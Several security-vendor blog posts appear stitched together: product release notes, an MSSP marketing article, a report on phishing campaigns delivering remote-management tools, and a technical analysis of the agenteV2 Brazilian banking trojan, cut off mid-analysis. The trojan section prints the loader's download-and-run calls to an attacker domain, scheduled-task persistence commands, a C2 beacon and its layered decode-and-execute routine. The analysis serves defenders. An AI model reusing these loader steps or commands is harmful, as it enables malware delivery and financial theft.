The biggest change is expanded access to Threat Intelligence: Free plan users now get 20 premium requests in TI Lookup and YARA Search. This gives security teams a practical way to check suspicious indicators, explore related sandbox sessions, and validate malware or phishing activity using real attack data. 

On the detection side, our team added 78 new behavior signatures, 1,657 new Suricata rules, and 35 new YARA rules. We also released new Threat Intelligence Reports covering malware, loaders, RATs, backdoors, and supply-chain threats observed in recent submissions. 

Here’s a closer look at what’s new. 

Product Updates 

In April, ANY.RUN expanded access to Threat Intelligence capabilities, giving more teams a way to test threat context directly in their SOC workflows. 

The key update: Free plan users now get 20 premium requests in TI Lookup and YARA Search. This gives security teams a practical way to check indicators, explore related sandbox sessions, and validate suspicious activity using real attack data from ANY.RUN’s community. 

More Threat Context with 20 Premium TI Requests 

Threat intelligence brings the most value when it helps teams make faster decisions during active investigations. Instead of stopping at one suspicious IP, domain, hash, or behavior, analysts can pivot to connected samples, infrastructure, artifacts, and attack context. 

With 20 premium requests now included in the Free plan, SOC and MSSP teams can explore threat data across IOCs, IOBs, and IOAs linked to recent malware and phishing activity. 

Teams can use this expanded access across key SOC workflows: 

• Alert triage: Check suspicious indicators against real sandbox data and get more context before closing or escalating an alert. 
• Incident response: Pivot from one indicator to related artifacts, infrastructure, and behavior to understand the wider attack chain. 
• Threat hunting: Use TI Lookup and YARA Search to test hypotheses against real-world malware data.
• Detection work: Find patterns and artifacts that can support new or improved detection logic. 

ANY.RUN also introduced AI-assisted search in TI Lookup, allowing users to describe what they need in natural language while the system helps translate the request into a structured query. 

With threat intelligence available directly in the workflow, SOC and MSSP teams can move faster from suspicious signal to confident action: 

• Faster alert validation: Teams can check suspicious indicators against real attack data and make decisions sooner. 
• Lower escalation noise: More context helps reduce escalations driven by uncertainty. 
• Shorter investigations: Analysts can move from one indicator to related samples, infrastructure, and behavior faster. 
• Stronger threat hunting: Teams can test hypotheses against current malware and phishing data. 
• Better detection quality: Real-world artifacts and behavior patterns can support more relevant detection logic. 
• More measurable security value: Faster triage, better prioritization, and clearer evidence help teams focus capacity on confirmed risk. 

Threat Coverage Updates 

In April, our detection team continued to strengthen ANY.RUN’s threat coverage with new behavior signatures, Suricata rules, and YARA rules. 

This month’s updates include: 

• 78 new behavior signatures 
• 1,657 new Suricata rules 
• 35 new YARA rules 

These additions help expand detection coverage across suspicious behavior, network activity, and file-based indicators. 

New Behavior Signatures  

In April, we added 78 new behavior signatures covering malware-specific activity, mutex-based indicators, suspicious persistence behavior, and exploitation-related activity. 

The new signatures focus on observable actions and artifacts that appear during detonation, helping teams move beyond file reputation and confirm what a sample actually does in the sandbox. 

Highlighted detections include: 

New Suricata Rules 

In April, we also added 1,657 new Suricata rules to improve visibility into malicious network activity, including payload retrieval, DLL downloads, and possible command-and-control checks. 

• DonutLoader base64-exe payload retrieval via HTTP (sid: 85007037): Detects malware’s attempts to get executable payload from stager server via HTTP 
• Winos/ValleyRAT DLL download via TCP (sid: 85007024): Identifies ValleyRAT related DLL-file downloads via non-standard port TCP connection 
• Possible AsyncRAT-style TCP C2 connectivity check (sid: 85007061): Heuristic rule tracking AsyncRAT-like malware implementations, based on set of connections to specific ports on the same host, likely checkingconnectivity with C2. 

With these additions, sandbox sessions can surface more network-level indicators tied to malware delivery and post-infection communication. 

New YARA Rules 

In April, ANY.RUN added 35 new YARA rules to expand static detection coverage for suspicious files and known threat artifacts. 

This layer is especially useful when a sample contains recognizable strings, code patterns, or structural markers that can link it to a known detection before or alongside behavior-based analysis. 

Highlighted YARA detections include: 

• Sentinel 
• Datto 
• Spank 
• DefendNot
• Raton 

Together, the new behavior signatures, Suricata rules, and YARA rules give security teams broader coverage across runtime behavior, network traffic, and file-level indicators. 

Threat Intelligence Reports 

In April, our team released new Threat Intelligence Reports covering recent malware activity, attacker tooling, and techniques observed across real-world submissions. 

Available as part of ANY.RUN’s TI Lookup Premium plan, these reports give security teams a clearer view of how specific threats behave, what artifacts they leave behind, and which indicators can support faster investigation. 

• MIMIC, CrystalX, and Trojanized Telnyx Package: This report covers MIMIC ransomware, CrystalX RAT, and a trojanized Telnyx Python SDK, focusing on encryption behavior, remote access and persistence, and malicious code execution through unauthorized PyPI releases. 

• ETHERRAT, OCRFix, and SILENTCONNECT: This brief examines a Node.js backdoor, a loader/botnet component, and a Windows loader, focusing on blockchain-based C2/configuration retrieval, scheduled-task persistence, in-memory PowerShell execution, and ScreenConnect deployment. 

• CRYSOME, INFINITY, and BRUSHWORM: This report examines a Windows RAT, a macOS stealer, and a Windows backdoor, focusing on TCP-based remote control, ClickFix-like delivery, credential theft, scheduled-task persistence, modular DLL download, and file theft. 

About ANY.RUN 

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and make confident decisions with real-world attack data. 

Its solutions, including Interactive Sandbox and Threat Intelligence, give SOC and MSSP teams the context they need to analyze malware, phishing, infrastructure, behaviors, and indicators in one workflow. 

Trusted by more than 15,000 organizations and 600,000 security professionals worldwide, including 74% of Fortune 100 companies, ANY.RUN helps teams improve triage speed, strengthen detection coverage, reduce investigation time, and respond to emerging threats with clearer evidence. 

Integrate ANY.RUN into your SOC workflow → 

The post Release Notes: Expanded Threat Intelligence Access, AI Assisted Search 1,770 New Detections and More appeared first on ANY.RUN's Cybersecurity Blog.

For MSSP leaders, this looks like an opportunity. And it is. The problem is that seizing it costs more than it used to. 

Key Points 

• Linear scaling kills margins.  
  Adding more clients traditionally requires proportionally more analysts, making profitable growth nearly impossible. 

• Alert noise is expensive. 
  Up to 70% of alerts are false positives that waste analyst time and inflate operational costs. 

• Context gaps slow everything down. 
  Disconnected tools force manual aggregation of data from multiple systems, delaying investigations. 

• Tool switching destroys efficiency. 
  Constant platform hopping increases turnaround time and contributes to missed SLAs. 

• Standardization is essential for multi-client environments. 
  Every client being unique creates bespoke processes that do not scale and accelerate analyst burnout. 

• ANY.RUN’s Threat Intelligence (TI Lookup + TI Feeds) and Interactive Sandbox work as an integrated infrastructure layer that reduces manual labor and improves unit economics. 

• True scalability comes from automation and shared context. 
  MSSPs can serve more clients at higher quality without linear headcount increases, while lowering stress and turnover. 

The quiet storm inside every MSSP 

Threat actors automate attacks at unprecedented speed, while client environments grow more complex and diverse. MSSP leaders face mounting pressure to deliver faster, deeper, and more reliable protection across dozens or hundreds of customers: all while keeping margins healthy and SLAs intact. 

• More clients still often means more analysts; 
• More alerts still means more noise; 
• More data still doesn’t mean more clarity. 

Meanwhile, the analysts carrying the weight are burning out. Turnover in MSSP analyst roles is among the highest in the industry, creating a perpetual cycle of recruitment, onboarding, and knowledge loss that compounds every other problem. 

MSSP leaders aren’t looking for “another feature.” They’re looking for something closer to an operational backbone. Something that reduces manual effort and improves unit economics without adding complexity. 

1. Linear Growth Equals Margin Death: The Scalability Trap 

For many MSSPs, growth is a paradox: every new client increases revenue — but also operational cost at nearly the same rate. Hiring, training, and retaining talent is expensive and painful, with turnover creating constant friction. The more manual the work your analysts do per client, the harder it is to decouple revenue from headcount.  

Your revenue line and your cost line climb together, and the margin in between never quite widens the way a growth business should. 

How ANY.RUN helps 

The Interactive Sandbox directly attacks the cost-per-investigation problem by compressing deep malware analysis from hours to minutes and speeding up triage, so each analyst can handle significantly more cases without sacrificing quality or output depth. 
 
To see how the Sandbox automatically interacts with malware detonating the kill chain elements and eliminating the need for manual interventions for a malware analyst, view an analysis session:

Threat Intelligence Lookup removes repetitive investigation steps by providing instant access to previously analyzed artifacts, indicators, and behaviors. It supports quick search across a huge database of contextual data on indicators and attacks drawn from sandbox investigations of over 15K SOC teams that are using ANY.RUN.  

Together, these solutions shift effort from linear human scaling to knowledge reuse and automation. Analysts spend less time rebuilding context and more time making decisions. 

2. Alert Noise Equals Wasted Money 

With up to 70% of alerts representing noise, MSSPs burn resources investigating false positives. Every unnecessary alert translates into extra analyst time, higher operational costs, and increased risk of missing genuine threats amid the fatigue. 

The downstream effects compound quickly. Analysts fatigued by noise start to triage faster and less carefully. Real threats get downgraded. Critical detections get buried under the volume. The service quality the MSSP is paid to deliver degrades — quietly, then suddenly. 

How ANY.RUN helps 

ANY.RUN Threat Intelligence — comprising TI Lookup and Threat Intelligence Feeds — puts a verification and enrichment layer in front of the analyst queue, so that the 70% that doesn’t matter gets filtered before it consumes investigation resources, and the 30% that does matter arrives with actionable context. 

• Cuts false positive handling time; 
• Raises triage confidence; 
• Reduces analyst fatigue across multi-client environments; 
• Feeds directly into SIEM and SOAR workflows. 

TI Lookup provides on-demand, deep queries across a continuously updated database of threats, allowing an analyst to determine in seconds whether a suspicious IP, domain, file hash, or URL is genuinely malicious, benign, or requires deeper analysis. 

destinationIP:”103.224.212.211″ 

TI Feeds deliver structured, high-fidelity threat data enriched with behavioral context that integrates directly into SIEM and SOAR workflows.  

Instead of raw indicator lists that require manual validation, analysts receive intelligence that has already been correlated with real-world malware behavior observed in the Sandbox. The noise doesn’t just get filtered; it gets explained. Analysts spend time on what matters, and triage decisions become faster and more defensible. 

3. Missing Context: The Manual Puzzle Problem 

An MSSP analyst’s work happens across a fractured landscape. Threat intelligence feeds live in one place. SIEM alerts in another. Endpoint telemetry in a third. Sandboxing results in a fourth. An analyst responding to an incident doesn’t get the full picture handed to them. They construct it, manually, by pulling data from multiple sources, correlating it in their head or in a spreadsheet, and hoping nothing slips through the cracks. 

This manual context assembly is slow, error-prone, and analyst-dependent. Investigations that should take minutes take hours. And in a threat landscape where speed matters, fragmented context is a liability that shows up in missed detections and broken SLAs. 

How ANY.RUN helps 

ANY.RUN collapses the distance between intelligence and action by delivering investigation context as a connected whole, giving MSSPs faster incident resolution, less analyst-dependent knowledge, and investigation outputs that hold their value even when team composition changes. 

• Eliminates manual context assembly; 
• Connects intelligence to behavior; 
• Reduces investigation time per incident. 

ANY.RUN’s modules are designed for seamless integration and context sharing. The Interactive Sandbox delivers comprehensive behavioral data in one place: processes, network activity, MITRE ATT&CK mappings, and more. TI Lookup instantly correlates any indicator (IOC, IOA, or IOB) with related threats, full attack chains, and supporting sandbox reports. TI Feeds extend this intelligence across the entire stack, feeding enriched data into existing workflows. 

Analysts no longer “build the picture manually.” They access unified, actionable intelligence that accelerates triage, investigation, and reporting across all clients, reducing context gaps and enabling consistent, high-quality outcomes. The investigation pipeline becomes a connected workflow rather than a manual collage. 

4. Tool-Switching: The Hidden Time Tax 

Constantly jumping between platforms kills efficiency and extends turnaround times. Analysts lose momentum with every tab switch, every login, and every manual data transfer, directly impacting SLA compliance and team morale. 

When tools are slow, unreliable, or disconnected, analysts route around them. They rely on memory, on informal knowledge-sharing, on workarounds. All of it introduces inconsistency and risk. 

How ANY.RUN Helps 

ANY.RUN’s API-first architecture is built to disappear into the workflows analysts already use, surfacing intelligence in the context where work is happening, rather than requiring analysts to pivot toward it. The result is less friction, higher adoption, and more consistent investigation quality across the team. 
 
TI Lookup and TI Feeds can be embedded directly into SIEM, SOAR, and ticketing environments, so analysts can surface intelligence without leaving the context they’re already working in. The Interactive Sandbox can be invoked as part of an automated or semi-automated investigation pipeline, with results returned in structured, machine-readable formats that feed directly into case management. 

The goal is to make ANY.RUN invisible in the best sense: present at every stage of investigation, without requiring analysts to pivot their attention toward it. 

5. No Standardization — Scaling Chaos Across Clients 

No two MSSP clients are alike. One runs a legacy on-premises environment with minimal telemetry. Another is cloud-native with dozens of SaaS integrations. A third has custom applications, bespoke logging configurations, and a security team with strong opinions about how investigations should be documented. For the MSSP trying to serve all three, the challenge isn’t just operational: it’s structural. 

When client environments are siloed, institutional knowledge about one doesn’t transfer to another. When investigation workflows differ by engagement, onboarding new analysts takes longer, errors are harder to catch, and QA becomes a guessing game. What scales, in the absence of standardization, is chaos. And chaos has a cost. 

How ANY.RUN helps 

ANY.RUN Threat Intelligence was built with multi-tenant MSSP operations in mind. 

• Normalizes intelligence across client environments; 
• Gives analysts a single investigative interface; 
• Standardizes investigation outputs; 
• Shortens analyst onboarding. 

TI Feeds deliver structured, consistently formatted intelligence that can be normalized and applied across client environments without per-client customization of the data layer.  

TI Lookup gives analysts a single investigative interface regardless of which client environment they’re working in. And the Interactive Sandbox produces structured, reproducible analysis outputs — process trees, network maps, MITRE mappings, IOC exports — that can be templated into client-specific reporting workflows without requiring analysts to rebuild their investigation approach from scratch each time. 

Standardization doesn’t mean treating every client the same. It means having a consistent intelligence layer beneath the client-specific details, so that quality and speed hold constant even as the client roster grows. 

Analyst burnout (the pain that amplifies all others) 

When systems don’t scale, people absorb the pressure. Overload, repetitive work, constant alert fatigue — this is where everything converges. 

Burnout isn’t just a people problem. It’s an operational risk: 

• Higher turnover; 
• Knowledge loss 
• Reduced investigation quality 

How ANY.RUN helps 

By reducing noise, minimizing manual work, and accelerating investigations, the combined capabilities of Interactive Sandbox, TI Lookup, and TI Feeds directly lower cognitive and operational pressure. Analysts move from reactive overload to structured, efficient workflows. 

Conclusion: What MSSPs Are Actually Looking For 

The pains above are not independent problems. They are interconnected symptoms of the same underlying condition: MSSP operations that have scaled their client load without scaling the intelligence infrastructure underneath it. 

MSSPs don’t need more isolated features. They need: 

• Less manual aggregation; 
• Less switching; 
• More context, faster; 
• Reliable, always-available capabilities; 
• Infrastructure that improves margins, not just performance. 

When Threat Intelligence Lookup and Threat Intelligence Feeds operate as a unified threat intelligence layer, and Interactive Sandbox feeds it with fresh behavioral data, the result isn’t just efficiency. It’s a shift in how MSSPs operate: from effort-heavy scaling to intelligence-driven scaling.  

About ANY.RUN

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and with greater clarity across modern enterprise environments.   

It allows teams to safely execute suspicious files and URLs, observe real behavior in an Interactive Sandbox, enrich indicators with immediate context through TI Lookup, and monitor emerging malicious infrastructure using Threat Intelligence Feeds. Together, these capabilities help reduce investigation uncertainty, accelerate triage, and limit unnecessary escalations across the SOC.   

ANY.RUN is trusted by thousands of organizations worldwide and meets enterprise security and compliance expectations. It is SOC 2 Type II certified, demonstrating its commitment to protecting customer data and maintaining strong security controls. 

FAQ

The post Margin vs. Madness: Fixing MSSP Top 5 Operational Nightmares appeared first on ANY.RUN's Cybersecurity Blog.

In recent phishing-to-RMM campaigns observed by ANY.RUN analysts, threat actors are using fake Microsoft, Adobe, and OneDrive pages to deliver legitimate remote management tools instead of traditional malware. Once installed, these tools can give attackers remote access to a victim’s device while blending into software categories many enterprises already use or allow.

For security leaders, this creates a difficult visibility problem. The payload may be legitimate. The infrastructure may be trusted. The user action may look like a routine download. Yet the outcome is the same: unauthorized remote access inside the environment.

Key Takeaways 

• Phishing-to-RMM attacks create a dangerous visibility gap for enterprise SOCs: Attackers can deliver legitimate remote management tools through phishing pages that impersonate trusted services like Microsoft, Adobe, and OneDrive.

• The payload may not look malicious on its own: Tools such as ScreenConnect and LogMeIn Rescue can appear as legitimate remote administration software, especially in organizations where RMM usage is already allowed.

• Domain reputation is not enough: These attacks may use legitimate platforms, vendor infrastructure, or compromised websites instead of obvious newly registered domains.

• The real signal is in the full attack chain: SOC teams need to connect the phishing lure, download context, execution behavior, RMM installation, and outbound connections.

• For CISOs, the risk is operational as much as technical: Missed phishing-to-RMM activity can lead to slower detection, longer attacker dwell time, delayed containment, and weaker confidence in approved remote access tools.

• ANY.RUN helps turn gray-zone activity into evidence: With Interactive Sandbox and Threat Intelligence, teams can safely analyze suspicious URLs and files, trace RMM behavior, and investigate related phishing-to-RMM chains.

The Blind Spot: When “Allowed” Tools Become the Attack Path

Most enterprise security programs are built to separate malicious activity from normal operations. Phishing-to-RMM attacks blur that line.

An RMM installer can pass basic checks because it is not malware by design. But the risk is not in the tool alone. It is in the context around it: how it reached the user, whether the download was expected, which endpoint launched it, and what connection followed.

For CISOs, this is where the risk becomes critical. Unauthorized access can hide inside routine-looking activity, giving the business a false sense of control while the attacker is already inside.

The outcome can be serious: 

• Slower detection because the activity does not look like classic malware 
• Longer attacker dwell time inside the environment 
• Higher risk of lateral movement from the compromised endpoint 
• More pressure on SOC teams to investigate ambiguous alerts 
• Delayed containment because the initial access path is harder to prove 
• Weaker confidence in whether approved remote access tools are being used safely 

Which Organizations are Most Exposed 

ANY.RUN data shows that phishing-to-RMM activity is primarily concentrated in the United States, followed by Canada, Europe, and Australia. The most affected industries include Education, Technology, Banking, Government, Manufacturing, and Finance.

These sectors often depend on remote administration for IT support, distributed workforce management, and endpoint maintenance. That reliance creates more room for abuse: when RMM tools are already part of normal operations, unauthorized access can take longer to recognize and contain.

How Legitimate RMM Tools Are Delivered Through Phishing 

Since early April, the ANY.RUN team has observed a rise in phishing-to-RMM attacks, where threat actors use phishing to deliver legitimate remote management tools and gain remote access to victims’ devices.  

For just one of these campaigns, we are seeing more than 50 public analyses in ANY.RUN every week: suricataID:”84002229″

Phishing campaigns that deliver RMM tools are especially dangerous for SOC teams because these tools can appear to be legitimate remote administration software. If an organization already uses or allows RMM solutions, the launch of ScreenConnect may not immediately trigger security policies.

The screenshot below shows a phishing page impersonating Microsoft Store and Adobe Acrobat Reader DC. The user is prompted to download Adobesetup.exe, but behind that name is ScreenConnect; an RMM tool that attackers can use to establish remote access to the system.

View analysis session 

Another example shows the attack disguised as a protected Microsoft OneDrive download. The page at vmail.app.n8n.cloud displays a “Verify to Download” prompt for what appears to be a PDF document. Once the user clicks, they receive ScreenConnect.ClientSetup.exe:

This chain makes SOC triage more difficult: the phishing landing page is hosted on the legitimate n8n.cloud platform, while the RMM agent download and subsequent connection occur through legitimate ScreenConnect infrastructure.

The attack does not rely on obvious newly registered domains, which are often an easy signal for blocking. As a result, detection needs to be based on behavior, download context, and anomalies around RMM execution, not domain reputation alone.

In addition to ScreenConnect, threat actors use other legitimate RMM and remote-access tools in these phishing chains, including Datto RMM, ITarian, LogMeIn Rescue, Action1 RMM, NetSupport, Syncro, MeshAgent, SimpleHelp, RustDesk, and Splashtop.

To retrospectively track similar chains in ANY.RUN Threat Intelligence, teams can use the following query. As part of TI Lookup, every user has access to 20 full queries: 

threatName:”^phishing$” and threatName:”rmm-tool” 

In addition to standard installers, threat actors are also using more sophisticated delivery methods, as shown in this public analysis: 

In this example, the user is shown a phishing page with an Adobe document download lure. Instead of the expected file, the page delivers a VBS script. 

Once executed, the script attempts to elevate privileges through UAC, disable SmartScreen, and weaken Microsoft Defender protections. It then silently downloads the LogMeIn Rescue installer, removes the Mark-of-the-Web, and runs a quiet installation via msiexec, turning the endpoint into a system with unattended RMM access.

It is also worth noting that in campaigns like this, threat actors try to minimize easily blocked, lower-level IoCs from the Pyramid of Pain, such as newly registered domains.

Instead, phishing pages may be hosted on already existing websites. The domain itself appears legitimate, while the suspicious activity is hidden deeper in the URL — in an unusual URI path that may indicate SEO injection or a compromised website.

At the time of analysis, VirusTotal showed that no vendor had flagged this domain as malicious: 

Taken together, these cases reflect a broader shift from malware-first initial access to phishing-first initial access. Threat actors are increasingly gaining access not through an obviously malicious payload, but through social engineering and legitimate remote administration tools.

How SOC Teams Can Close the RMM Visibility Gap 

Phishing-to-RMM attacks cannot be handled like ordinary malware delivery. The payload may be legitimate, the infrastructure may be trusted, and the domain may not have a malicious reputation at the time of analysis.

To detect this activity earlier, SOC teams need visibility into the full attack chain, not just the final file. That means connecting:

• the phishing page that initiated the download 
• the file or script delivered to the user 
• the execution path on the endpoint 
• attempts to weaken security controls 
• RMM installation behavior 
• outbound connections to remote access infrastructure 

This is where ANY.RUN helps teams close the gap. With the Interactive Sandbox, security teams can safely examine suspicious URLs, files, and scripts during triage.

They can observe the phishing lure, delivered payload, execution flow, attempts to weaken security controls, RMM installation, and outbound connections in one controlled environment.

ANY.RUN Threat Intelligence adds the retrospective layer. Teams can search across public analyses, track phishing-to-RMM chains, pivot from one indicator to related activity, and understand whether a single event is part of a wider campaign.

For CISOs, this means more control over a risk that is usually hard to prove. The SOC can validate suspicious remote access activity faster, show how the access path started, and give leadership clearer evidence for containment and follow-up decisions.

Instead of relying on reputation-based signals or waiting for a high-confidence malware alert, security teams can prove when trusted tools are being abused. That gives CISOs stronger confidence in detection coverage, faster response readiness, and better visibility into whether approved remote access software is creating hidden business risk. 

About ANY.RUN 

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams detect, investigate, and respond to threats faster.

ANY.RUN solutions include Interactive Sandbox, Threat Intelligence Lookup, Threat Intelligence Feeds, and integrations for SOC workflows across SIEM, SOAR, EDR, and other security tools. Together, they help teams analyze suspicious files and URLs, uncover attacker behavior, enrich investigations with real-world threat context, and operationalize intelligence across their environment.

Built for security-conscious organizations, ANY.RUN is SOC 2 Type II attested and supports enterprise-ready controls such as SSO, MFA, granular privacy settings, and AES-256-CBC encryption.

Trusted by more than 15,000 organizations and 600,000 security professionals worldwide, ANY.RUN gives SOC teams the visibility they need to move from uncertain alerts to evidence-based decisions.

The post Phishing-to-RMM Attacks: The Remote Access Blind Spot CISOs Can’t Ignore  appeared first on ANY.RUN's Cybersecurity Blog.

A new phishing campaign targeting Brazilian users demonstrates how modern financial malware has evolved from simple credential theft into full-scale, operator-driven fraud platforms. Disguised as a judicial summons, this campaign leverages social engineering, multi-stage malware delivery, and real-time remote access capabilities to compromise victims and actively assist attackers in financial theft.  

For organizations, the implications extend beyond individual users. Employees accessing corporate systems, financial platforms, or crypto wallets from infected endpoints can unintentionally expose business-critical assets. The malware’s ability to stream screens, execute commands, and harvest credentials in real time makes it particularly dangerous for finance teams, executives, and organizations operating in or with Brazil. 

This is not just phishing. It’s a live intrusion channel into financial workflows. Technical analysis below.  

Attack Overview 

The malware at the heart of this campaign, agenteV2, functions as a full interactive backdoor. Once installed, it streams the victim’s screen to the attacker in real time, enabling live, operator-assisted financial fraud. A human operator watches the victim’s desktop session as it happens, waiting for a banking portal to open, and then takes direct control. 

The malware targets credentials and sessions at seven major Brazilian financial institutions — Itaú, Banco do Brasil, Caixa Econômica Federal, Bradesco, Santander, Inter, and Stone — as well as five major cryptocurrency wallet extensions. It also probes host systems for the presence of specialized Brazilian anti-fraud software (Diebold Warsaw, GbPlugin), indicating deliberate, well-researched targeting of the Brazilian financial ecosystem. 

Executive Summary 

1. This Is Live Financial Fraud, Not Passive Credential Theft. 

Business perspective: agenteV2 establishes a persistent WebSocket backdoor with live screen streaming and a remote shell. The attacker watches the victim’s screen in real time and acts manually the moment a banking session opens. Financial losses can occur within minutes of infection, before any traditional alert fires. 

Deploy ANY.RUN Interactive Sandbox to detonate suspicious email attachments in a live, controlled environment before they reach employee inboxes. 

2. The Lure Is Convincing Enough to Fool Security-Aware Staff. 

Business perspective: The phishing email impersonates a Brazilian federal court using a case number format indistinguishable from authentic CNJ court references. Even employees trained to spot phishing are likely to treat a realistic judicial summons as a high-priority communication requiring immediate action. 

Use ANY.RUN Threat Intelligence Lookup to check suspicious email sender domains, embedded URLs, and attachment hashes instantly against a continuously updated threat intelligence database. A 10-second lookup is sufficient to surface this campaign’s known indicators. 

3. The Malware Survives Reboots, IT Maintenance, and Password Resets. 

Business perspective: Three separate persistence mechanisms — two Scheduled Tasks at maximum privilege and a Registry Run key — ensure the malware remains operational across reboots, routine IT maintenance, and even password changes.  

ANY.RUN Threat Intelligence Feeds deliver structured IOCs directly into your SIEM and EDR for automated hunting across your entire endpoint fleet. Any host matching these indicators should be treated as actively compromised and isolated immediately. 

4. Blocking the Known C2 IP Is Not Enough. 

Business perspective: The malware reads its command-and-control server address from a public Pastebin page. The attacker can silently rotate to a new IP by editing a single page — without redeploying, recompiling, or redelivering any malware. IP blocklists become stale within hours of a C2 rotation. 

Replace IP-based blocking with behavior-based detection. The agenteV2 TLS client fingerprint (JA3 hash)) is stable across infrastructure rotations and can be deployed as a detection rule in your IDS/NDR/EDR. 

5. Traditional AV Will Not Catch This: Behavioral Analysis Is Required. 

Business perspective: The core stealer DLL is compiled from Python to native machine code with Nuitka — no bytecode is extractable and standard decompilers do not apply. Files are disguised with legitimate names (wifi_driver.exe, msedge04.exe) and the payload executes entirely in memory before touching disk.  

Behavioral sandbox analysis is the only reliable pre-execution detection method for Nuitka-compiled threats. The YARA rule in this report (Win_Stealer_AgenteV2_Nuitka) is deployable via ANY.RUN TI infrastructure for automated variant detection. 

Detailed Technical Analysis 

This attack was fully analyzed in ANY.RUN’s Interactive Sandbox, which provided full visibility into the multi-stage infection chain, process trees, network connections, API traces, and registry modifications in a live, controllable Windows 11 environment. 

View the phishing analysis session 

The threat actor operates a well-structured infrastructure spanning phishing delivery, staged payload distribution, a Pastebin-based dead-drop resolver, and a dedicated C2 server hosted on a bulletproof VPS provider in Germany. 

The final payload, internally named agenteV2, is a Python-based interactive Banking Trojan and Information Stealer whose core logic (agenteV2_historico_detect.dll) is compiled with Nuitka into native machine code.  

It is not a passive fire-and-forget stealer — it establishes a persistent WebSocket backdoor (uws://) enabling live screen streaming (PIL + mss), an interactive remote shell (subprocess.Popen dispatched via CMD:SHELL: parsing), and real-time operator control over the victim session. Persistence is achieved via Registry Run key and Scheduled Tasks (/rl highest), and a Pastebin dead-drop resolver enables rapid C2 rotation without redeployment. 

1. Initial Artifact Analysis 

1.1 Email lure (.eml) 

The campaign is delivered via email impersonating an official judicial summons from the Tribunal de Justiça do Distrito Federal (TJDF), referencing a fabricated civil conciliation hearing (case number 2194839-33.2026.8.07.1876). The case number format matches the authentic Brazilian CNJ numbering standard, increasing credibility. 

1.2 Social Engineering Mechanism 

The PDF attachment requires a password to open a technique to bypass email gateway sandboxes that cannot interact with password-protected documents. Upon ‘failing’ to open, the PDF instructs the victim to download a VBS file via a ‘click here’ link, attributing the error to a missing software component. This two-step friction is deliberate: it filters unengaged recipients and increases commitment of those who proceed. 

2. Infection Chain 

The full process tree and infection chain graph are visible in the sandbox detonation: WScript.exe → cmd.exe → schtasks + wifi_driver.exe execution flow:  

The processes include malware delivery, payload delivery, persistence establishment, and more:

3. Stage 1 VBScript Loader (0124_INTMACAO_.vbs) 

3.1. Runtime Behavior (API Trace) 

The following sequence was reconstructed from the ANY.RUN script API trace, showing the exact execution order of COM object calls: 

Phase 1 reiniciar.exe download and persistence (~13 seconds post-execution): 

IServerXMLHTTPRequest2.Open('GET', 'https://nuevaprodeciencia.club/br77b/arquivos/download/reiniciar.exe', False) 

IServerXMLHTTPRequest2.Send()                      -> HTTP 200 OK 

ADODB.Stream.Type = 1 (binary) 

ADODB.Stream.Write(ResponseBody)                   -> VT_ARRAY 

ADODB.Stream.SaveToFile('C:\Program Files (x86)\Wi-fi\reiniciar.exe', 2) 

IWshShell3.Run('cmd.exe /c schtasks /create /f /tn "RunAsAdmin_Executar" ...reiniciar.exe... /sc onlogon /rl highest', 0, False)

Phase 2 wifi_driver.exe download, persistence and initial beacon (~22–29 seconds): 

IServerXMLHTTPRequest2.Open('GET', 'https://nuevaprodeciencia.club/br77b/arquivos/download/msedge04.exe', False) 

IServerXMLHTTPRequest2.Send()                      -> HTTP 200 OK 

ADODB.Stream.SaveToFile('C:\Program Files (x86)\Wi-fi\wifi_driver.exe', 2) 

IWshShell3.Run('"C:\Program Files (x86)\Wi-fi\wifi_driver.exe"', 1, False)  // executed twice 

WScript.Sleep(3000) 

IWshShell3.Run('cmd.exe /c schtasks /create /f /tn "RunAsAdmin_AutoUpdate" ...wifi_driver.exe... /sc onlogon /rl highest', 0, False) 

IWshShell3.Run('https://nuevaprodeciencia.club/br77b/iayjaskyeiagds.php', 1, False)  // initial C2 beacon 

Key observations: 

• wifi_driver.exe is executed twice before Sleep(3000) retry mechanism to ensure process startup; 

• The server-side filename is msedge04.exe; it is saved locally as wifi_driver.exe deliberate renaming at download time; 

• The initial C2 beacon is fired by the VBS loader itself via IWshShell3.Run, before the payload’s own beaconing loop begins. 

3.2. Obfuscation & Payload Decoding Mechanism 

The VBS loader implements a multi-layer obfuscation pipeline that decodes and executes a secondary payload entirely in memory. Despite its apparent complexity, the mechanism is fully deterministic and reversible — all decoding logic, keys, and transformations are self-contained in the script, with no external dependencies or dynamic key generation. 

The two on-disk forms confirm runtime deobfuscation: 

C:\Users\admin\Downloads\0124_INTMACAO_.vbs          (16,739 bytes  — obfuscated, as delivered) 

C:\Users\admin\AppData\Local\Temp\0124_INTMACAO_.vbs (140,302 bytes — fully decoded runtime copy) 

The ~8.4x expansion factor is explained by the encoding pipeline described below. 

The encoded payload is stored as a large string built via repeated concatenation: 

tEXXKcvxSM = tEXXKcvxSM & "<chunk>" 

This pattern avoids signature-based detection of long static strings, prevents straightforward extraction, and obscures the actual payload size. It is a common technique in commodity VBS loaders. 

Three transformation functions are applied in sequence before the payload is executed: 

Step 1 — Triple Base64 Decoding. The function AqBVqmjYfY wraps the MSXML2.DOMDocument COM object to perform Base64 decoding. It is called three consecutive times, nesting the calls:

b = AqBVqmjYfY(AqBVqmjYfY(AqBVqmjYfY(b)))

Triple-encoding increases entropy and defeats naive single-pass decoders, but provides no cryptographic security — each layer is independently and trivially reversible. 

Step 2 — Hexadecimal Decoding. The function YnrbBGjUXH converts the Base64-decoded output from a hex-encoded byte stream into raw bytes: 

Chr(CInt("&H" & Mid(h, i, 2))) 

This confirms the intermediate payload is stored as a hex string, adding one further layer of visual obfuscation over the Base64 output. 

Step 3 — Custom Byte Transformation (Pseudo-Encryption). The function obmFYHGTeJ is the core obfuscation layer. It applies a Vigenere-like modular subtraction cipher using a hardcoded array of multiple keys: 

keys = Array("xsTqWN3wxwsA", "Bydpez94dTlZ", ...) 

For each byte, the routine iterates through all keys in reverse order and applies: 

ch = (ch - keyByte + 256) Mod 256 

This is similar to a repeated-key XOR/Vigenere cipher. It is not cryptographically secure — the keys are hardcoded in the script, the transformation is deterministic, and the decoding pipeline is fully reproducible offline. The critical weakness is that all key material is embedded in the script itself. 

After the three-stage decoding, the final payload is executed directly in memory without writing any intermediate artifact to disk: 

Execute obmFYHGTeJ(tEXXKcvxSM)

